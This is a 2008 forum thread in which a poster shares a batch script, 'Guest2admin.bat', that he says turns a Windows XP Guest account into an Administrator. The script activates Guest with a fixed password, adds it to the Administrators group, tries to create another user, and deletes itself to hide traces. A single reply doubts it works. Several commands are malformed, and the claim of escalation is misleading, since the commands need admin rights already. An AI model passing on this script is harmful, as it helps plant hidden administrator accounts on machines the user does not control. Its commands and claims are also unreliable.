Convert Guest Account into Administrator Account

Discussion in 'Windows' started by AGENT 32, Oct 15, 2008.

  1. AGENT 32

    AGENT 32 New Member

    Joined:
    Oct 14, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Now here’s a small trick I found by which you can convert a Guest account on Windows XP into an Administrator one.

    All you need to do is copy the code below, copy/paste it into Notepad and save it as Guest2admin.bat on your desktop.


    echo off
    title Please wait...
    cls
    net user add Username Password /add
    net user localgroup Administrators Username /add
    net user Guest 420 /active:yes
    net localgroup Guests Guest /DELETE
    net localgroup Administrators Guest /add
    del %0


    Double-click the file to execute or type the above-given code in Command Prompt.

    I have only tried this once or twice. I found this file in a corner of my PC, so I thought sharing it with my readers.

    I hope you enjoyed this little trick.
     
  2. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    720
    Likes Received:
    16
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    http://computertipaday.blogspot.com
    this may not work dude.
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice